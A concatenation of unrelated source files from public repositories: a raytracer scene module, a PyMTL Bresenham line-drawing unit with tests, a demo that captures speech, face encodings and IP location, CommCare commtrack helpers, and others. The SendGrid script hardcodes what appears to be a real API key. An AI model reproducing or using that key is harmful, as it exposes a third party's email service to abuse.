custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = ['_static']\n\n# ############################################################################\n# ############################################################################\n# Example configuration for intersphinx: refer to the Python standard library.\nintersphinx_mapping = {\n 'python': ('https://docs.python.org/3', None),\n 'numpy': ('http://docs.scipy.org/doc/numpy/', None),\n 'matplotlib': ('http://matplotlib.org', None),\n 'sphinx': ('http://www.sphinx-doc.org/en/stable/', None),\n # 'pyalluv': ('https://pyalluv.readthedocs.io/', None),\n # 'colorseq': ('https://colorsequence.readthedocs.io/', None)\n }\n# ############################################################################\n# ############################################################################\n\n# ############################################################################\n# ############################################################################\n# If true, the current module name will be prepended to all description\n# unit titles (such as .. 
function::).\nadd_module_names = False\n# ############################################################################\n# ############################################################################\n","repo_name":"tools4digits/MajorTrack","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"de","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"30103836215","text":"from PIL import Image\nimport numpy as np\nimport time\nimport copy\nfrom multiprocessing import Pool, cpu_count\nfrom .utils import colour_functions as cf\nfrom .camera import Camera\nfrom .utils.constants import *\nfrom .utils.vector3 import vec3, rgb\nfrom .ray import Ray, get_raycolor, get_distances\nfrom . import lights\nfrom .backgrounds.skybox import SkyBox\nfrom .backgrounds.panorama import Panorama\n\n\ndef get_raycolor_tuple(x):\n return get_raycolor(*x)\n\n\ndef batch_rays(rays, batch_size):\n batches = []\n n_rays = len(rays)\n for ray_ind in range(0, n_rays, batch_size):\n batches.append(Ray.concatenate(rays[ray_ind : ray_ind + batch_size]))\n return batches\n\n\nclass Scene:\n def __init__(self, ambient_color=rgb(0.01, 0.01, 0.01), n=vec3(1.0, 1.0, 1.0)):\n # n = index of refraction (by default index of refraction of air n = 1.)\n\n self.scene_primitives = []\n self.collider_list = []\n self.shadowed_collider_list = []\n self.Light_list = []\n self.importance_sampled_list = []\n self.ambient_color = ambient_color\n self.n = n\n self.importance_sampled_list = []\n\n def add_Camera(self, look_from, look_at, **kwargs):\n self.camera = Camera(look_from, look_at, **kwargs)\n\n def add_PointLight(self, pos, color):\n self.Light_list += [lights.PointLight(pos, color)]\n\n def add_DirectionalLight(self, Ldir, color):\n self.Light_list += [lights.DirectionalLight(Ldir.normalize(), color)]\n\n def add(self, primitive, importance_sampled=False):\n self.scene_primitives += [primitive]\n self.collider_list += primitive.collider_list\n\n if importance_sampled == True:\n self.importance_sampled_list += [primitive]\n\n if primitive.shadow == True:\n self.shadowed_collider_list += primitive.collider_list\n\n def add_Background(self, img, light_intensity=0.0, blur=0.0, spherical=False):\n\n primitive = None\n if spherical == False:\n primitive = SkyBox(img, light_intensity=light_intensity, blur=blur)\n else:\n primitive = Panorama(img, light_intensity=light_intensity, blur=blur)\n\n self.scene_primitives += [primitive]\n self.collider_list += primitive.collider_list\n\n def render(self, samples_per_pixel, progress_bar=False, batch_size=None):\n\n print(\"Rendering...\")\n\n t0 = time.time()\n color_RGBlinear = rgb(0.0, 0.0, 0.0)\n\n all_rays = [self.camera.get_ray(self.n) for i in range(samples_per_pixel)]\n\n n_proc = cpu_count()\n rays_per_batch = len(self.camera.get_ray(self.n))\n batch_size = batch_size or np.ceil(samples_per_pixel / n_proc).astype(int)\n\n all_rays_batched = batch_rays(all_rays, batch_size)\n args = [(batch, copy.deepcopy(self)) for batch in all_rays_batched]\n # all_rays = [\n # (self.camera.get_ray(self.n), copy.deepcopy(self))\n # for i in range(samples_per_pixel)\n # ]\n if progress_bar == True:\n try:\n import progressbar\n except ModuleNotFoundError:\n print(\"progressbar module is required. 
\\nRun: pip install progressbar\")\n\n bar = progressbar.ProgressBar(maxval=samples_per_pixel)\n\n with Pool(processes=n_proc) as pool:\n bar.start()\n for i, color in enumerate(\n pool.imap_unordered(get_raycolor_tuple, args)\n ):\n for batch in range(batch_size):\n beg, end = batch * rays_per_batch, (batch + 1) * rays_per_batch\n color_RGBlinear += color[beg:end]\n bar.update(i)\n bar.finish()\n\n else:\n with Pool(processes=n_proc) as pool:\n for i, color in enumerate(\n pool.imap_unordered(get_raycolor_tuple, args)\n ):\n for batch in range(batch_size):\n beg, end = batch * rays_per_batch, (batch + 1) * rays_per_batch\n color_RGBlinear += color[beg:end]\n\n # average samples per pixel (antialiasing)\n color_RGBlinear = color_RGBlinear / samples_per_pixel\n # gamma correction\n color = cf.sRGB_linear_to_sRGB(color_RGBlinear.to_array())\n\n print(\"Render Took\", time.time() - t0)\n\n img_RGB = []\n for c in color:\n # average ray colors that fall in the same pixel. (antialiasing)\n img_RGB += [\n Image.fromarray(\n (\n 255\n * np.clip(c, 0, 1).reshape(\n (self.camera.screen_height, self.camera.screen_width)\n )\n ).astype(np.uint8),\n \"L\",\n )\n ]\n\n return Image.merge(\"RGB\", img_RGB)\n\n def get_distances(\n self,\n ): # Used for debugging ray-primitive collisions. Return a grey map of objects distances.\n\n print(\"Rendering...\")\n t0 = time.time()\n color_RGBlinear = get_distances(self.camera.get_ray(self.n), scene=self)\n # gamma correction\n color = color_RGBlinear.to_array()\n\n print(\"Render Took\", time.time() - t0)\n\n img_RGB = [\n Image.fromarray(\n (\n 255\n * np.clip(c, 0, 1).reshape(\n (self.camera.screen_height, self.camera.screen_width)\n )\n ).astype(np.uint8),\n \"L\",\n )\n for c in color\n ]\n return Image.merge(\"RGB\", img_RGB)\n","repo_name":"HinMal/Python-Raytracer","sub_path":"sightpy/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":5689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"15472541373","text":"import random\nimport time\n\n# import pygame\n\nfrom pymtl3 import *\nfrom pymtl3.passes.yosys import TranslationImportPass\nimport random\n\n\n# s = 1000\n# width = s\n# height = s\n#\n# screen = pygame.display.set_mode((width, height))\n#\n#\n# def random_lines():\n# sum = 0\n# for x in range(1000):\n# start = time.time()\n# r = random.randint(0, 255)\n# g = random.randint(0, 255)\n# b = random.randint(0, 255)\n# x0 = random.randint(0, width - 1)\n# x1 = random.randint(0, width - 1)\n# y0 = random.randint(0, height - 1)\n# y1 = random.randint(0, height - 1)\n# line(x0, y0, x1, y1, r, g, b)\n# pygame.display.flip()\n# sum += 1. 
/ (time.time() - start)\n# print(sum / 1000)\n#\n#\n# def line(x0, y0, x1, y1, r, g, b):\n# dx = abs(x1 - x0)\n# dy = abs(y1 - y0)\n# sx = 1 if x0 < x1 else -1\n# sy = 1 if y0 < y1 else -1\n# err = (dx >> 1) if dx > dy else -(dy >> 1)\n#\n# while 1:\n# screen.set_at((x0, y0), (r, g, b))\n# # print \"(\" + str(x0) + \",\" + str(y0) + \"),(\" + str(x1) + \",\" + str(y1) + \")\"\n# if (x0 == x1) & (y0 == y1):\n# break\n# e2 = err\n# if e2 > -dx:\n# err -= dy\n# x0 += sx\n# if e2 < dy:\n# err += dx\n# y0 += sy\n\ndef line2(x0, y0, x1, y1):\n arr = [0] * 32\n result = [0] * 2\n dx = abs(x1 - x0)\n dy = abs(y1 - y0)\n\n if (x0 < x1):\n sx = 1;\n else:\n sx = -1;\n\n if (y0 < y1):\n sy = 1;\n else:\n sy = -1;\n\n if (dx > dy):\n err = (dx >> 1);\n else:\n err = -(dy >> 1);\n\n while (1):\n\n arr[y0 - 1] |= 1 << (x0 - 1);\n # print(\"{0:32b}\".format(arr[y0-1]))\n\n # print('x1:', x1, 'y1:', \"%d\" %(y1))\n if ((x0 == x1) & (y0 == y1)):\n break;\n\n e2 = err;\n if (e2 > -dx):\n err -= dy;\n x0 += sx;\n\n if (e2 < dy):\n err += dx;\n y0 += sy;\n\n # print('x0:', x0, 'y0:', \"%d\" %(y0))\n result[0] = x0\n result[1] = y0\n # for i in range(0 , 31):\n # # for j in range(0 , 31):\n # # print( ((arr[i]>>j)&1), ' ', end=\"\")\n # # print(bin(arr[i]))\n # print(\"{0:32b}\".format(arr[i]))\n # #print('')\n return result\n\n\nclass BresenhamUnitFL(Component):\n def construct(s, type):\n s.x0 = InPort(type)\n s.y0 = InPort(type)\n s.x1 = InPort(type)\n s.y1 = InPort(type)\n s.output_x = OutPort(type)\n s.output_y = OutPort(type)\n\n @s.update\n def calc():\n x0 = s.x0\n y0 = s.y0\n x1 = s.x1\n y1 = s.y1\n dx = abs(x1 - x0)\n dy = abs(y1 - y0)\n\n if (x0 < x1):\n sx = 1;\n else:\n sx = -1;\n\n if (y0 < y1):\n sy = 1;\n else:\n sy = -1;\n\n if (dx > dy):\n err = (dx >> 1);\n else:\n err = -(dy >> 1);\n\n while (1):\n # print('x0:', x0, 'y0:', \"%d\" % (y0))\n s.output_x = x0\n s.output_y = y0\n if ((x0 == x1) & (y0 == y1)):\n break;\n e2 = err;\n if (e2 > -dx):\n err -= dy;\n x0 += sx;\n if (e2 < dy):\n err += dx;\n y0 += sy;\n\nclass BresenhamUnitRTL(Component):\n def construct(s, type):\n s.trigger = InPort(b1)\n s.x0 = InPort(type)\n s.y0 = InPort(type)\n s.x1 = InPort(type)\n s.y1 = InPort(type)\n s.valid = OutPort(b1)\n s.output_x = OutPort(type)\n s.output_y = OutPort(type)\n\n s.state = Wire(b2)\n s.S0 = b3(0)\n s.S1 = b3(1)\n s.S2 = b3(2)\n s.S3 = b3(3)\n s.nextState = Wire(b2)\n\n s.w_x0 = Wire(type)\n s.w_y0 = Wire(type)\n s.w_x1 = Wire(type)\n s.w_y1 = Wire(type)\n\n s.w_valid = Wire(b1)\n\n s.w_dx = Wire(type)\n s.w_dy = Wire(type)\n\n s.w_sx = Wire(type)\n s.w_sy = Wire(type)\n\n s.w_err = Wire(type)\n s.w_e2 = Wire(type)\n\n @s.update\n def update():\n\n if s.reset:\n s.state = s.S0\n s.w_valid = b1(0)\n s.w_x0 = type(0)\n s.w_y0 = type(0)\n s.w_x1 = type(0)\n s.w_y1 = type(0)\n s.w_dx = type(0)\n s.w_dy = type(0)\n else:\n s.state = s.nextState\n\n if s.state == s.S0:\n if s.trigger: #assign initial values\n s.w_valid = b1(0)\n s.w_x0 = s.x0\n s.w_y0 = s.y0\n s.w_x1 = s.x1\n s.w_y1 = s.y1\n s.w_dx = s.x1 - s.x0\n s.w_dy = s.y1 - s.y0\n s.nextState = s.S1\n else:\n s.nextState = s.S0\n\n # \"The less than and greater than operators always treat the operands as un-signed\"\n # www.csl.cornell.edu/courses/ece4750/handouts/ece4750-tut3-pymtl.pdf page 9\n elif s.state == s.S1:\n if s.w_dx[5] == 0: # if dx >= 0 (i don't know how to parametrize that part)\n s.w_sx = type(1)\n else:\n s.w_dx = 0 - s.w_dx # else abs(dx)\n s.w_sx = type(-1)\n if s.w_dy[5] == 0: # if dy >= 0\n s.w_sy = type(1)\n else:\n 
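                    # Reaching this branch means bit 5 (the sign bit of the 6-bit
                    # two's-complement value) is set, i.e. w_dy is negative, so
                    # 0 - w_dy yields abs(dy), mirroring the w_dx handling above.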
s.w_dy = 0 - s.w_dy # else abs(dy)\n                    s.w_sy = type(-1)\n                s.nextState = s.S2\n            elif s.state == s.S2:\n                if s.w_dx > s.w_dy: # both values >=0\n                    s.w_err = s.w_dx >> 1\n                else:\n                    s.w_err = 0 - (s.w_dy >> 1) # err can have neg value\n                s.nextState = s.S3\n            elif s.state == s.S3:\n                s.w_e2 = s.w_err\n                if s.w_e2[5] == 0: # if e2 > 0\n                    # then we dont need to check if (e2 > -dx) - it is\n                    s.w_err -= s.w_dy # no problem with two's complement arithmetics\n                    s.w_x0 += s.w_sx\n                    if (s.w_e2 < s.w_dy): # no problem with this comparison - e2 always >= 0\n                        s.w_err += s.w_dx\n                        s.w_y0 += s.w_sy\n                else: # here we know that e2 < 0 and (0 - dx) < 0\n                    if s.w_e2 > (0-s.w_dx): # and we can compare two \"negative\" vals normal way\n                        s.w_err -= s.w_dy\n                        s.w_x0 += s.w_sx\n                    # here we know that e2 < 0 and dy > 0\n                    s.w_err += s.w_dx # then we dont need to check if (e2 < dy) - it is\n                    s.w_y0 += s.w_sy\n                if (s.w_x0 == s.w_x1) & (s.w_y0 == s.w_y1): #check if algorithm has finished\n                    s.w_valid = b1(1)\n                    s.nextState = s.S0\n                else:\n                    s.nextState = s.S3\n\n            s.output_x = s.w_x0\n            s.output_y = s.w_y0\n            s.valid = s.w_valid\n\ndef test_fl():\n    model = BresenhamUnitFL(b6)\n    model.elaborate()\n    sim = model.apply(SimpleSim)\n    for i in range(1, 100):\n        model.reset()\n        randA = random.randint(1, 32)\n        randB = random.randint(1, 32)\n        randC = random.randint(1, 32)\n        randD = random.randint(1, 32)\n        model.x0 = randA\n        model.y0 = randB\n        model.x1 = randC\n        model.y1 = randD\n        print('x0:', randA, 'y0:', randB, 'x1:', randC, 'y1:', randD)\n        model.tick()\n        print('output_x: ', model.output_x)\n        print('output_y: ', model.output_y)\n        print(\"\")\n        result = line2(randA, randB, randC, randD)\n        assert model.output_x == result[0]\n        assert model.output_y == result[1]\n\n\ndef test_rtl():\n\n    dut = BresenhamUnitRTL(b6)\n    dut.elaborate()\n\n    dut.yosys_translate_import = True\n    dut = TranslationImportPass()(dut)\n\n    # Create a simulator\n    dut.dump_vcd = True\n    dut.vcd_file_name = \"Bresenham\"\n    dut.elaborate()\n    dut.apply(SimulationPass)\n    dut.sim_reset()\n    for i in range(1, 100):\n\n        randA = random.randint(1, 32)\n        randB = random.randint(1, 32)\n        randC = random.randint(1, 32)\n        randD = random.randint(1, 32)\n\n        dut.x0 = b6(randA)\n        dut.y0 = b6(randB)\n        dut.x1 = b6(randC)\n        dut.y1 = b6(randD)\n        print('x0:', randA, 'y0:', randB, 'x1:', randC, 'y1:', randD)\n        dut.tick()\n        dut.trigger = b1(1)\n        dut.tick()\n        dut.trigger = b1(0)\n        while dut.valid == b1(0):\n            dut.tick()\n        print('output_x: ', \"%d\" % (dut.output_x))\n        print('output_y: ', \"%d\" % (dut.output_y))\n        print('')\n        result = line2(randA, randB, randC, randD)\n        assert dut.output_x == result[0]\n        assert dut.output_y == result[1]\n\n\n# random_lines()\n# pygame.quit()\n\ntest_fl()\ntest_rtl()\n","repo_name":"Hugo-L3174/Advanced_System-on-chip_Design","sub_path":"pyMTL/bresenham.py","file_name":"bresenham.py","file_ext":"py","file_size_in_byte":9475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"37997807818","text":"import json\nimport time\nimport uuid\n\nimport cv2\nimport face_recognition as fr\nimport speech_recognition as sr\nimport imageio\nimport requests\n\nrecog = sr.Recognizer()\n\n# Record from microphone\nwith sr.Microphone() as microphone:\n    print('Adjusting for ambient noise')\n    recog.adjust_for_ambient_noise(microphone)\n    print('Please say something now...')\n    from_timestamp = int(time.time())\n    audio = recog.listen(microphone)\n    to_timestamp = int(time.time())\n    spoken = recog.recognize_google(audio, language='EN-us')\n    
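# NOTE (annotation): recognize_google() sends the captured audio to Google's free web API and\n    # can raise sr.UnknownValueError (speech not understood) or sr.RequestError (network/API\n    # failure); a hardening sketch, not in the original file:\n    #     try:\n    #         spoken = recog.recognize_google(audio, language='EN-us')\n    #     except (sr.UnknownValueError, sr.RequestError):\n    #         spoken = None\n    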
print('Audio capture complete')\n\n# Record from camera\nprint(\"Initialising camera\")\ncam = cv2.VideoCapture(0)\nprint('Please look into the camera...')\nfor i in range(3,0,-1):\n print(i)\n time.sleep(1)\nret, frame = cam.read()\n\nprint('Image capture complete')\nprint('Resizing image')\nsmall_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\nprint('Converting the image from BGR color (OpenCV) to RGB color (face_recognition)')\nrgb_small_frame = small_frame[:, :, ::-1]\nprint('Detecting faces')\nface_locations = fr.face_locations(rgb_small_frame)\nface_encodings = fr.face_encodings(rgb_small_frame, face_locations)\n\nprint('Detecting location from IP')\nresp = requests.get('https://ipinfo.io')\nif resp.status_code == 200:\n print('Location detected')\n network_loc = resp.json()\nelse:\n network_loc = None\n print('Warning: device not online')\n\nprint('Storing information on disk')\nimageio.imwrite('capture_peripheral.jpg', frame)\n\ncaptures = []\n\nif spoken:\n capture = {\n 'id': str(uuid.uuid4()),\n 'type': 'poplesia/types/audio_capture',\n 'timestamp': from_timestamp,\n 'agent': {\n 'id': str(uuid.uuid4()),\n 'type': 'microphone',\n 'spec': 'MacBook Pro (15-inch, 2017)',\n 'location': network_loc\n },\n 'text': spoken\n }\n captures.append(capture)\n\nfor face_encoding in face_encodings:\n capture = {\n 'id': str(uuid.uuid4()),\n 'type': 'poplesia/types/face_capture',\n 'timestamp': from_timestamp,\n 'agent': {\n 'type': 'camera',\n 'id': str(uuid.uuid4()),\n 'location': network_loc,\n },\n 'face_encoding_128': face_encoding.tolist()\n }\n captures.append(capture)\n\nwith open('capture_peripheral.json', 'w') as capture_file:\n for capture in captures:\n capture_file.write(f'{json.dumps(capture)}\\n')\nprint('Wrote capture to disk')\n\nprint()\nprint('Summary:')\nprint(f'- Speech detected: {spoken}')\nprint(f'- Faces detected: {len(face_encodings)}')\nprint(f'- Location detected: {network_loc is not None}')\n","repo_name":"skipperkongen/poplesia","sub_path":"demos/peripheral_demo.py","file_name":"peripheral_demo.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41403974588","text":"from graph import CityNetwork\nimport const\nfrom copy import deepcopy\n\n\ncityNetKm = CityNetwork(const.DISTANCES)\na,b = cityNetKm.findShortestPathBetweenAllSelectedLocations(['roma', 'milano', 'torino'])\nprint(a, b)\nc,d = cityNetKm.findAlternative(a)\nprint(c, d)\n\nc,d = cityNetKm.findAlternativeAB(a, 'roma', 'torino')\nprint(c, d)","repo_name":"paolaguarasci/game","sub_path":"src/v3/calculateSimplePath.py","file_name":"calculateSimplePath.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19023841790","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport cellconstructor as CC\nimport cellconstructor.Structure\nimport cellconstructor.Phonons\nimport cellconstructor.symmetries\n\ntry:\n import spglib\nexcept:\n raise ValueError(\"Error, to run this example you need to install spglib\")\n \n \n\"\"\"\nThis code loads a dynamical matrix with the structure that barely \nsatisfy a C2/c monoclinic group (with a 0.04 threshold) and\nconstrain the symmetries to allow programs like quantum espresso\nto detect symmetries correctly.\n\n\nNOTE: To recognize symmetries this example uses spglib.\n\"\"\"\n\nimport sys, os\n\ndef test_impose_symmetry():\n total_path = 
os.path.dirname(os.path.abspath(__file__))\n    os.chdir(total_path)\n\n\n    # initialize the dynamical matrix\n    dyn = CC.Phonons.Phonons(\"old_dyn\", full_name=True)\n\n    # Print the symmetry group at high threshold\n    GROUP = spglib.get_spacegroup(dyn.structure.get_ase_atoms(), 0.05)\n    s_group_expected = spglib.get_spacegroup(dyn.structure.get_ase_atoms())\n    print (\"Space group with high threshold:\", s_group_expected)\n    print (\"Space group with low threshold:\", GROUP)\n\n    # Get the symmetries from the new spacegroup\n    symmetries = spglib.get_symmetry(dyn.structure.get_ase_atoms(), symprec = 0.05)\n    print(\"Number of symmetries: {}\".format(len(symmetries[\"rotations\"])))\n\n    # Transform the spglib symmetries into the CellConstructor data type\n    sym_mats = CC.symmetries.GetSymmetriesFromSPGLIB(symmetries, True)\n    # Force the symmetrization\n    dyn.structure.impose_symmetries(sym_mats)\n\n    # Check once again the symmetry\n    s_group_after = spglib.get_spacegroup(dyn.structure.get_ase_atoms())\n    print (\"New space group with high threshold:\", s_group_after)\n\n    assert s_group_after == GROUP\n\n\nif __name__ == \"__main__\":\n    test_impose_symmetry()\n","repo_name":"SSCHAcode/CellConstructor","sub_path":"tests/TestImposeSymmetries/test_impose_symmetries.py","file_name":"test_impose_symmetries.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"}
{"seq_id":"72673060533","text":"\"\"\"Retrieve and print words from a URL.\"\"\"\n\nimport sys\nfrom urllib.request import urlopen\n\n\ndef fetch_words(url):\n    \"\"\"Fetch the text document at ``url`` and return its whitespace-separated words.\"\"\"\n    story = urlopen(url)\n    story_words = []\n    for line in story:\n        line_words = line.decode('utf-8').split()\n        for word in line_words:\n            story_words.append(word)\n    story.close()\n    return story_words\n\n\ndef print_items(items):\n    \"\"\"Print each item on its own line.\n\n    Args:\n        items (iterable): items to print\n    \"\"\"\n    for item in items:\n        print(item)\n\n\ndef main(url):\n    \"\"\"Fetch the document at ``url`` and print its words.\n\n    Args:\n        url (str): URL of a UTF-8 text document\n    \"\"\"\n    words = fetch_words(url)\n    print_items(words)\n\n\nif __name__ == '__main__':\n    main(sys.argv[1])\n","repo_name":"csreehari/corepy","sub_path":"words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"11854660835","text":"import os\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail\n\nmessage = Mail(\n    from_email='contact@scl-solution.com',\n    to_emails='web.clabots@gmail.com',\n    subject='SCL - Merci pour votre email !',\n    html_content='<strong>This is a test from python !!</strong>')\ntry:\n    sg = SendGridAPIClient('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')\n    response = sg.send(message)\n    print(response.status_code)\n    print(response.body)\n    print(response.headers)\nexcept Exception as e:\n    print(e)","repo_name":"SimClb/scl","sub_path":"sclWebsite/mailsending.py","file_name":"mailsending.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"32849570151","text":"from xml.etree import ElementTree\nfrom dimagi.utils.couch.database import get_db\nfrom casexml.apps.case.models import CommCareCase\nfrom corehq.apps.commtrack import const\nfrom corehq.apps.commtrack.models import (\n    CommtrackConfig, CommtrackActionConfig, LocationType, RequisitionActions,\n    
CommtrackRequisitionConfig, Product, SupplyPointCase, RequisitionCase, Program\n)\nfrom corehq.apps.locations.models import Location\nimport itertools\nfrom datetime import datetime, date, timedelta\nfrom calendar import monthrange\nimport math\nimport bisect\nfrom corehq.apps.hqcase.utils import submit_case_blocks\nfrom casexml.apps.case.mock import CaseBlock\nfrom casexml.apps.case.xml import V2\n\n\ndef all_supply_point_types(domain):\n return [e['key'][1] for e in get_db().view('commtrack/supply_point_types', startkey=[domain], endkey=[domain, {}], group_level=2)]\n\ndef supply_point_type_categories(domain):\n config = CommtrackConfig.for_domain(domain)\n categories = config.supply_point_categories\n other_types = set(all_supply_point_types(domain)) - set(config.known_supply_point_types)\n categories['_oth'] = list(other_types)\n return categories\n\ndef all_sms_codes(domain):\n config = CommtrackConfig.for_domain(domain)\n\n actions = dict((action.keyword, action) for action in config.actions)\n products = dict((p.code, p) for p in Product.by_domain(domain))\n commands = {\n config.multiaction_keyword: {'type': 'stock_report_generic', 'caption': 'Stock Report'},\n }\n\n sms_codes = zip(('action', 'product', 'command'), (actions, products, commands))\n return dict(itertools.chain(*([(k.lower(), (type, v)) for k, v in codes.iteritems()] for type, codes in sms_codes)))\n\ndef get_supply_point(domain, site_code=None, loc=None):\n if loc is None:\n loc = Location.view('commtrack/locations_by_code',\n key=[domain, site_code.lower()],\n include_docs=True).first()\n if loc:\n case = SupplyPointCase.get_by_location(loc)\n else:\n case = None\n\n return {\n 'case': case,\n 'location': loc,\n }\n\ndef make_product(domain, name, code, program_id):\n p = Product()\n p.domain = domain\n p.name = name\n p.code = code.lower()\n p.program_id = program_id\n p.save()\n return p\n\ndef make_program(domain, name, code):\n p = Program()\n p.domain = domain\n p.name = name\n p.code = code.lower()\n p.save()\n return p\n\ndef get_or_make_def_program(domain):\n program = [p for p in Program.by_domain(domain) if p.name == \"Default\"]\n if len(program) == 0:\n return make_program(domain, 'Default', 'def')\n else:\n return program[0]\n\n\ndef bootstrap_commtrack_settings_if_necessary(domain, requisitions_enabled=False):\n if not(domain and domain.commtrack_enabled and not domain.commtrack_settings):\n return\n\n c = CommtrackConfig(\n domain=domain.name,\n multiaction_enabled=True,\n multiaction_keyword='report',\n actions=[\n CommtrackActionConfig(\n action='receipts',\n keyword='r',\n caption='Received',\n ),\n CommtrackActionConfig(\n action='consumption',\n keyword='c',\n caption='Consumed',\n ),\n CommtrackActionConfig(\n action='consumption',\n subaction='loss',\n keyword='l',\n caption='Losses',\n ),\n CommtrackActionConfig(\n action='stockonhand',\n keyword='soh',\n caption='Stock on hand',\n ),\n CommtrackActionConfig(\n action='stockout',\n keyword='so',\n caption='Stock-out',\n ),\n ],\n location_types=[\n LocationType(name='state', allowed_parents=[''], administrative=True),\n LocationType(name='district', allowed_parents=['state'], administrative=True),\n LocationType(name='block', allowed_parents=['district'], administrative=True),\n LocationType(name='village', allowed_parents=['block'], administrative=True),\n LocationType(name='outlet', allowed_parents=['block', 'village']),\n ],\n supply_point_types=[],\n )\n if requisitions_enabled:\n c.requisition_config = 
get_default_requisition_config()\n\n c.save()\n\n program = make_program(domain.name, 'Default', 'def')\n make_product(domain.name, 'Sample Product 1', 'pp', program.get_id)\n make_product(domain.name, 'Sample Product 2', 'pq', program.get_id)\n make_product(domain.name, 'Sample Product 3', 'pr', program.get_id)\n\n return c\n\ndef get_default_requisition_config():\n return CommtrackRequisitionConfig(\n enabled=True,\n actions=[\n CommtrackActionConfig(\n action=RequisitionActions.REQUEST,\n keyword='req',\n caption='Request',\n ),\n CommtrackActionConfig(\n action=RequisitionActions.APPROVAL,\n keyword='approve',\n caption='Approved',\n ),\n CommtrackActionConfig(\n action=RequisitionActions.PACK,\n keyword='pack',\n caption='Packed',\n ),\n CommtrackActionConfig(\n action=RequisitionActions.RECEIPTS,\n keyword='rec',\n caption='Requisition Receipts',\n ),\n ],\n )\n\ndef due_date_weekly(dow, past_period=0): # 0 == sunday\n \"\"\"compute the next due date on a weekly schedule, where reports are\n due on 'dow' day of the week (0:sunday, 6:saturday). 'next' due date\n is the first due date that occurs today or in the future. if past_period\n is non-zero, return the due date that occured N before the next due date\n \"\"\"\n cur_weekday = date.today().isoweekday()\n days_till_due = (dow - cur_weekday) % 7\n return date.today() + timedelta(days=days_till_due - 7 * past_period)\n\ndef due_date_monthly(day, from_end=False, past_period=0):\n \"\"\"compute the next due date on a monthly schedule, where reports are\n due on 'day' day of the month. (if from_end is true, due date is 'day' days\n before the end of the month, where 0 is the last day of the month). 'next' due date\n is the first due date that occurs today or in the future. if past_period\n is non-zero, return the due date that occured N before the next due date\n \"\"\"\n if from_end:\n assert False, 'not supported yet'\n\n month_diff = -past_period\n if date.today().day > day:\n month_diff += 1\n month_seq = date.today().year * 12 + (date.today().month - 1)\n month_seq += month_diff\n\n y = month_seq // 12\n m = month_seq % 12 + 1\n return date(y, m, min(day, monthrange(y, m)[1]))\n\ndef num_periods_late(product_case, schedule, *schedule_args):\n last_reported = datetime.strptime(getattr(product_case, 'last_reported', '2000-01-01')[:10], '%Y-%m-%d').date()\n\n class DueDateStream(object):\n \"\"\"mimic an array of due dates to perform a binary search\"\"\"\n\n def __getitem__(self, i):\n return self.normalize(self.due_date(i + 1))\n\n def __len__(self):\n \"\"\"highest number of periods late before we stop caring\"\"\"\n max_horizon = 30. 
* 365.2425 / self.period_length() # arbitrary upper limit -- 30 years\n return math.ceil(max_horizon)\n\n def due_date(self, n):\n return {\n 'weekly': due_date_weekly,\n 'monthly': due_date_monthly,\n }[schedule](*schedule_args, past_period=n)\n\n def period_length(self, n=100):\n \"\"\"get average length of reporting period\"\"\"\n return (self.due_date(0) - self.due_date(n)).days / float(n)\n\n def normalize(self, dt):\n \"\"\"convert dates into a numerical scale (where greater == more in the past)\"\"\"\n return -(dt - date(2000, 1, 1)).days\n\n stream = DueDateStream()\n # find the earliest due date that is on or after the most-recent report date,\n # and return how many reporting periods back it occurs\n return bisect.bisect_right(stream, stream.normalize(last_reported))\n\ndef submit_mapping_case_block(user, index):\n mapping = user.get_location_map_case()\n\n if mapping:\n caseblock = CaseBlock(\n create=False,\n case_id=mapping._id,\n version=V2,\n index=index\n )\n else:\n caseblock = CaseBlock(\n create=True,\n case_type=const.USER_LOCATION_OWNER_MAP_TYPE,\n case_id=location_map_case_id(user),\n version=V2,\n owner_id=user._id,\n index=index\n )\n\n submit_case_blocks(\n ElementTree.tostring(caseblock.as_xml()),\n user.domain,\n user.username,\n user._id\n )\n\n\ndef location_map_case_id(user):\n return 'user-owner-mapping-' + user._id\n\n\ndef is_commtrack_location(user, domain):\n return True if user and user.location_id and domain.commtrack_enabled else False\n\n\ndef get_case_wrapper(data):\n return {\n const.SUPPLY_POINT_CASE_TYPE: SupplyPointCase,\n const.REQUISITION_CASE_TYPE: RequisitionCase,\n }.get(data.get('type'), CommCareCase)\n\n\ndef wrap_commtrack_case(case_json):\n return get_case_wrapper(case_json).wrap(case_json)\n","repo_name":"gmimano/commcaretest","sub_path":"corehq/apps/commtrack/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":9427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24486583593","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\"\"\"\nNotes:\n # https://stackoverflow.com/questions/51070465/is-it-possible-to-get-the-directory-of-a-specific-nautilus-window-in-a-script?noredirect=1#comment95427874_51070465\n sudo apt install python-nautilus\n mkdir -p ~/.local/share/nautilus-python/extensions\n\"\"\"\nimport ubelt as ub\nimport time\nimport six\nimport re\nimport pipes\nimport logging\nfrom vimtk import cplat\n\nlogger = logging.getLogger(__name__)\n\n\ndef is_directory_open(dpath):\n # 